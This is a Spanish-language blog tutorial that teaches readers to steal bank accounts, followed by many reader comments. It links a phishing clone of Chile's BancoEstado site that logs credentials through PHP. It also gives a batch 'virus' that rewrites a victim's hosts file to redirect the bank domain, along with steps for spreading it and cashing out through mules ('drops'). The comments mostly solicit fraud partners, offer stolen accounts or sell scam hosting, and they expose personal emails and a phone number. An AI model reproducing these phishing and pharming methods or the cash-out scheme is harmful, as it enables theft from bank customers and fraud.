| Mobile| RSS

como robar cuentas de bancos by Torpedo

jueves, 21 de agosto de 2008 | Tags: | 57 Comentarios

1)Cuanta Bancaria
Bueno lo primero que todo es sacaruna cuenta corriente para poder tener la plata de las cuentas de bancos robadas.

2)el scam
Bueno primero que todo Que es un scam?
bueno un scam es una pagina clon a la de un banco o cualquer web para asi hacer que la victima ingreses sus datos personales a la web clon para poder obtener tener la clabe .
ya pero poder hacer un scam hay que editar la web bajarla y hacer todo un trabajo, pero por aora no les enseñare como ahcer un scam sino que en otro tutorial x aora solo les dejare uno para demostrarles mas adelante me pueden pedir scams
aca les dejo un escam del banco del estado(chile)
http://rapidshare.com/files/77420106/BancoEstado.rar.html
Cuando descompriman el .rar se daran cuenta que adentro estaran todoslos elementos de las web + un .php + .txt
entonces lo que hace el scam es que cunado uno ingresas los datos, los datos se los envia al .php y lo que hace el .php es guardar los datos en el .txt.

3)Hosting web
Bueno este es uno de los grandes problemas :/ conseguir un host que soporte php y no tenga publisidad... lamentablemente yo no consco ninguno asi, asique lo mejor es tener un host de paga y despues repones los gastos con la plata que robes con los scams
pero si no tienen un host de paga usen www.t35.com

4)Phraming
bueno este es un truco para cuando uno suponte abre www.google.cl se te redirija hacia la web clon.
el funcionamiento de esto es editar un archivo del pc llamado "host" que al editarlo uno al entrar a sierta web desde el navegador se te redirijira a tu scam.
para esto nesesitamos crear un "virus" y hacer que la victima lo abra , OJO! solo se redirijira la web si la victima abre el "virus".
bueno aca lesdejo el virus que esta en batch
pasos:
1.- inicio -> cmd -> ping "la web de tu scam"
ejemplo: ping www.torpedo.com
al hacer eso nos dara la ip del scam, asi que guardala

2.- abrir de el block de notas y pegar esto

Código:
@echo off
120.00.00.00 www.xxxxxx.com >> %windir%system32driversetchosts
exit
entonces editamos la sigente linea "120.00.00.00 www.xxxxxx.com " en donde sale 120.00.00.00 ponemos la ip que consegimos con el ping y en www.xxxx.com ponemos la web victima x ejemplo asi
Código:
@echo off
66.45.237.220 www.bancoestado.com >> %windir%system32driversetchosts
exit
3.- guardarlo con la extencion .bat

entonces despues compilamos en batch se lo enviamos a la victima la victima lo abre y cuando la victima se meta a la web www.bancoestado.com se redirijira a la web scam

4.-alfinando detalles
aca subimos los archivos del .rar al host, le hacemos un par de pruebas al scam para ver si funciona, compilamos el batch y se lo enviamos a la victima y/o lo expandimos x p2p o cuanquier forma xd

5.-el fin
ya teniendo la clabe y el rut de un usuario de un banco nos buncamos drops de siertos paises(osea si tienes una cuenta de maxico nesesitas drops en mexico).Pero que eso los drops? es gente encargada de sacar la plata de las cuentas de bancos sin dejar registro, esa gente normalmente trabaja en el banco o conose a algen que trabeje en el banco etc... entonces les enviamos la clabe y el rut a un drops negocias con el le dices q se quede con un 50% de la plata y asi asen un trato justo y el drop y tu salen ganando

57 Respondiendo
gravatar
Anónimo
on 2 de mayo de 2009, 22:56  

me gusta todo lo que explicas, pero tengo una pregunta? es posible que bendas targetas co su # de cave; pero esto tambien serviria como estafa si se fuese a comprar una de estas.

gravatar
blogTEU-Informatico
on 3 de mayo de 2009, 12:48  

La verdad para hacer eso tienes que tener fisicamente la tarjeta de credito

gravatar
Anónimo
on 16 de marzo de 2011, 19:17  

no seria mas facil comprar las cuentas a alguien como tu asi se evitaria los pasos y es un negocio mas rapido j.anse01@hotmail.com

gravatar
Anónimo
on 16 de marzo de 2011, 19:18  

j.ansel01@hotmail.com

gravatar
Anónimo
on 17 de marzo de 2011, 14:32  

me interesa te dejo mi mail layrabelaqua@hotmail.com

gravatar
Anónimo
on 2 de junio de 2011, 4:28  

conozco gente de nivel economico alto no tengo escrupulos vseguimientos@hotmail.com estas en mexico 5510157160 mandame un mensaje o correo yo me comunico compro el host. ok

gravatar
Anónimo
on 27 de septiembre de 2011, 14:48  

me interesa mucho tedejo mi correo g5_15@hotmail.com

gravatar
Anónimo
on 20 de octubre de 2011, 16:00  

sabes tengo la tarjeta de credito de mi pareja y cambio la clave como la adquiero nuevamente..gracias saludos::

gravatar
Anónimo
on 20 de octubre de 2011, 16:00  

sabes tengo la tarjeta de credito de mi pareja y cambio la clave como la adquiero nuevamente..gracias saludos::
noisestylo@gmail.com te dejo mi correo gracias:::

gravatar
Anónimo
on 12 de noviembre de 2011, 12:51  

hola! necesito saber si hay alguien aqui interesado (a) en retirar un dinero de una cuenta tengo claves y todo pero no conosco gente que quiera atreverse, y otra cosa como comprar con tarjeta de credito por internet e otro paises o vaciar la tarjeta ? escribime a chemitacastillo33@hotmail.com

gravatar
Anónimo
on 13 de noviembre de 2011, 12:11  

hola. necesito contactar a un buen hacker, mi correo es de hotmail malv1990

gravatar
Anónimo
on 13 de diciembre de 2011, 16:33  

Hola la persona que tiene las cuentas con clave to lo hago l_Molina1975@yahoo.com

gravatar
Anónimo
on 13 de diciembre de 2011, 16:35  

Envié el email mal. El correcto es l_molina1975@yahoo.com

gravatar
Anónimo
on 10 de marzo de 2012, 22:07  

Interesante!!

gravatar
Anónimo
on 3 de mayo de 2012, 13:12  

esta re bueno y quisiera aprender mi mail es bryan-0629@hotmail.com contactame o dime donde te puedo contactar....

gravatar
Anónimo
on 13 de mayo de 2012, 20:47  

SON TODOS UNA BANDA DE LADRONES INDECENTES, LA ESCORIA DE LA HUMANIDAD!!!! IR AL INFIERNO HDP

gravatar
Anónimo
on 21 de agosto de 2012, 0:01  

hey, no es por nada pero me gustaria que me ayudaras asi paso a paso lo de como meterme a una cuenta bancaria, no sabria como agradecertelo... mi correo josue_lopez1994@hotmail.com espero tu respuesta.

gravatar
Anónimo
on 29 de agosto de 2012, 13:49  

hola te agradezco si me puedes ayudar con el tema de verdad lo necesito.
mi e_mail es mariaymonsalve@gmail.com

gravatar
Anónimo
on 3 de septiembre de 2012, 18:11  

Hola yo tengo 15 años y estoy en una situacion desesperada necesitaria que me ayudes con esto y te lo agradeceria solo necesito hacerlo 1 veces y no es mucho dinero gracias mi mail por si me quieres ayudar robertodel10@hotmail.com o balanceonthewordl@hotmail.com el segundo es mas posible que lo habra pero el otro es para estas cosas por favor lo necesito de urgencia

gravatar
Anónimo
on 20 de septiembre de 2012, 12:03  

Hola, tengo las claves de dos cuentas del trabajo en donde estaba antes. Necesitaría alguien que me oriente para saber como extraer dinero de esas cuentas. Es una empresa con muchos ingresos. Mi mail es drjhonls@gmail.com

gravatar
Anónimo
on 28 de septiembre de 2012, 12:20  

TENGO INTERES EN EL TEMA ME PUEDES CONTACTAR ymediod@yahoo.com.mx

gravatar
Anónimo
on 4 de octubre de 2012, 7:49  

Hola,

me interesa que me contactes, fui estafado por un tipo, le deposite en su cuenta rut y nunca mas apareció.
quiero recuperar mi dinero y si tiene mas sacarle todo para que aprenda lo que se siente. Es injusto que le hagan eso a personas que les cuesta conseguir las cosas. y bueno, pagaré por esto... escribeme a teatro.colofon@gmail.com

gracias

gravatar
Anónimo
on 23 de octubre de 2012, 12:49  

puedes resubir el link del scam de ese banco de chile para saber como es el formulario php!

gravatar
Anónimo
on 23 de noviembre de 2012, 12:56  

me interesa mucho aprender por favor contactame lexndrs7@hotmail.com

gravatar
Anónimo
on 30 de noviembre de 2012, 15:44  

Hola me encantaría poder sacarle dinero a todos estos ladrones del país que roban millones de pesos diarios a gente de clase media baja.... se lo merecen si alguien tiene algo de interés para poder hacer escríbame a este correo: metalpajaro@gmail.com

gravatar
Anónimo
on 4 de enero de 2013, 10:03  

igual me gustaria a prender a sacar dinero de las cuentas sin que se dieran cuenta respondan a este coreo pblcartes48@gmail.com

gravatar
Anónimo
on 7 de enero de 2013, 15:02  

necesito que me ayudes urgente pago %60 de comision es urgente y tiene que ser hoy , 3.1415e@gmail.com

gravatar
Anónimo
on 14 de febrero de 2013, 20:02  

NECESITARIA QUE ME ENVIES TU INFORMACION TENGO VARIAS CUENTAS PARA HACKEAR Y SI TE INTERESA COMPARTIMOS EN 50% Y 50% PARA HACERLO DE UNA VEZ SON DE VARIOS BANCOS ESTE ES MI CORREO
LAVDINER02@HOTMAIL.COM

gravatar
Anónimo
on 4 de abril de 2013, 16:58  

Pero no se Dan cuentan cuando UNO lo ac o akso no nos pueden rastrear?? O ratrear nuestra direccion IP de la PC de la cual lo Estamos aciendo????

gravatar
Anónimo
on 19 de mayo de 2013, 15:26  

hola vendo hosting cpanel mailer scam full botnet entre otro skype:dominican888 or yahoo messenger kraneo2010@yahoo.com

gravatar
Anónimo
on 23 de mayo de 2013, 11:48  

Magnificent site. A lot of useful information here. I am sending it to
some buddies ans additionally sharing in delicious.

And naturally, thanks in your effort!

Also visit my webpage:

gravatar
Raton callejero
on 23 de mayo de 2013, 14:00  

Saludos tengo un numero de cuentas y no se como hacerlo para sacar mc3740801@gmail.com

gravatar
Anónimo
on 4 de junio de 2013, 16:08  

HOLA PODRÍAS CONTACTAR CON MIGO ME ES URGENTE GRACIAS AQUÍ ESTA MI CORREO,YASLINJEREZ@AYHOO,COM.MX

gravatar
Anónimo
on 4 de junio de 2013, 20:26  

Hola tambien estoy en el tema, me quede en el paso de la extraccion del cash. hagamos negocio. contactame windowsperformances@gmail.com

gravatar
Anónimo
on 6 de julio de 2013, 19:07  

hola necesito hacer un desvio de fondos te doy el numero de la cuenta mi correo dam.guerrero@hotmail.com muchas gracias.

gravatar
Soluciones Digitales Xiom
on 9 de julio de 2013, 12:02  
Este comentario ha sido eliminado por el autor.
gravatar
Anónimo
on 9 de julio de 2013, 12:04  

porfa puedes mandar un inbox a mi correo para conversar y tener una explicacion mas clara espero respuestas grax jaysont411@gmail.com

gravatar
Anónimo
on 18 de septiembre de 2013, 23:38  

hola..me gustaria que me ayudes a hack algunas cuentas bancarias..responedeme a greys277@hotmail.com gracias..

gravatar
Anónimo
on 5 de octubre de 2013, 9:45  

oye has un tutorial explicando todo porfabor

gravatar
alfredo
on 26 de octubre de 2013, 17:06  

tengo datos de cuentas bancarias grosas,que datos tengo que tener para poder hackear.
respondanme a ver si puedo hacerme de unos $$$$$$$$$
robertomascardi@hotmail.com comparto con quien lo pueda hacer 50%.

gravatar
Anónimo
on 2 de noviembre de 2013, 15:12  

Me gustaria qe te contactes conmigo para llegar a un buen acuerdo de meterme a cuentas grandes para hacerdiferncia en cuanto a plata.muy discreto..mi correo es wacojuanito@hotmail.com. podemos hacer grandes negocios.

gravatar
Anónimo
on 11 de noviembre de 2013, 20:01  

Oye compa tengo aqui recibos de nos parientes que ya no estan aqui, cres poder ayudarme a sacar una buena cantidad, mi correo es neto_fast@hotmail.com espero y puedas ayudarme, arreglamos el visnes mas adenlante

gravatar
Anónimo
on 20 de noviembre de 2013, 23:26  

Hola te puedo ayudar te dejo mi correo kiko_ra.1982@hotmail.com contactame para ayudarte a sacar ese sinero

gravatar
alexa puga
on 7 de enero de 2014, 20:36  

Muy buena la explicación me gustaría ponerme en contacto contigo tengo cuentas para sacar y la gente donde podemos transferir el dinero y sacarlo escribeme alexapugap@gmail.com

gravatar
Anónimo
on 15 de febrero de 2014, 11:36  

Mi cuenta esta vacia quien tenga la necesidad de hacer alguna prueba, depositar en esta cuenta de ahorro
#472019726807 Banco general.
La cuenta fue creada anonima por lo tanto solo se puede sacar efectivo x tarjeta.

gravatar
Anónimo
on 17 de febrero de 2014, 5:35  

Bueno bueno yo soy web master por lo de los host yo lo hago solo que si necesitariamos varias personas dedicadas a mandar sploids a usuarios para que abran estas paginas y con suerte registrarian sus usuarios y keys como normalmente solo que al entrar redirigirlos denuevo a su banca normal y tendriamos su información pero >>>>< lo siguiente es crear las diferentes cuentas para vaciar estas de las victimas si alguien cree poder hacerlo soy materia dispuesta para el negocio. pero no vengan a decir ya tengo las cuentas solo deposita por que ni un niño lo haria ok., se trata de realizar transferencias y ovio que uno deve tener control de acceso a esas cuentas creadas. y les comento si deven ser cuentas donde uno maneje el dinero por medios electronicos no sean niños a nadie le combendria depositar en cuentas donde solo existe una tarjeta . si comprenden contacten

moncerrathth@gmail.com

gravatar
Anónimo
on 26 de febrero de 2014, 16:20  

Hola. Alguien q tenga cuentas para extraer dinero y rrpartir ganancias mandar mail a sibelias@hotmail.com

gravatar
Anónimo
on 14 de marzo de 2014, 22:26  

erisjpm@hotmail.com envizme un mail estoy super interesado xq trabajo con gente asi aqui en vzla pero me dan el 50% pero quiero ser yo quien lo haga comunicate ahi mi mail

gravatar
Anónimo
on 9 de abril de 2014, 14:53  

kiero hackear a un weon k me estafo !! para k no siga haciendo sus webadas !!!
x fa..!! te doy mi correo : davix_chef@hotmail.com y te doy su nuemro de cuenta y su nombre completo !! te doy el 80%

gravatar
Anónimo
on 10 de abril de 2014, 15:20  

Quiero hackear a una persona que me estafo te doy mi correo:chelivl62@yahoo.com.mx tengo todos sus datos comunicate con migo por favor

gravatar
Anónimo
on 10 de abril de 2014, 15:36  

Quiero hackear a una persona que me estafo te doy mi correo:chelivl62@yahoo.com.mx, tengo todos sus datos espero me contestes pronto

gravatar
Anónimo
on 27 de mayo de 2014, 9:57  

alguien interesado que quiera hacer transferencias a mi cuenta rut avisarme al correo ozmlstayl_07@hotmail.com

gravatar
Anónimo
on 16 de junio de 2014, 1:14  

Tengo numeros de cuenta informacion y todo, ojo menos las clave obviamente, pero los numeros de cuenta que tengo tienen bastante dinero, interesados.. josecm26@hotmail.com


son cuentas bancarias de venezuela...

gravatar
Anónimo
on 19 de junio de 2014, 12:02  

Estoy interesado!!!

gravatar
Anónimo
on 19 de junio de 2014, 12:07  

Estoy interesado...

gravatar
Anónimo
on 10 de julio de 2014, 9:27  

estimdo bi tu block te cuento un maldito me estafo por la pagina de ventas yapo.cl aca en chile
y quiero debolversela y recuperar mi plata tengo su nombre y su rut
por favor necesito tu ayuda
comunicate con migo porfavor

ahi te dejo mi correo
f_ormenoinzunza@outlook.com

gravatar
Anónimo
on 8 de septiembre de 2014, 7:40  

Interesado mi correo Silen8895@yahoo.com

Publicar un comentario en la entrada

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter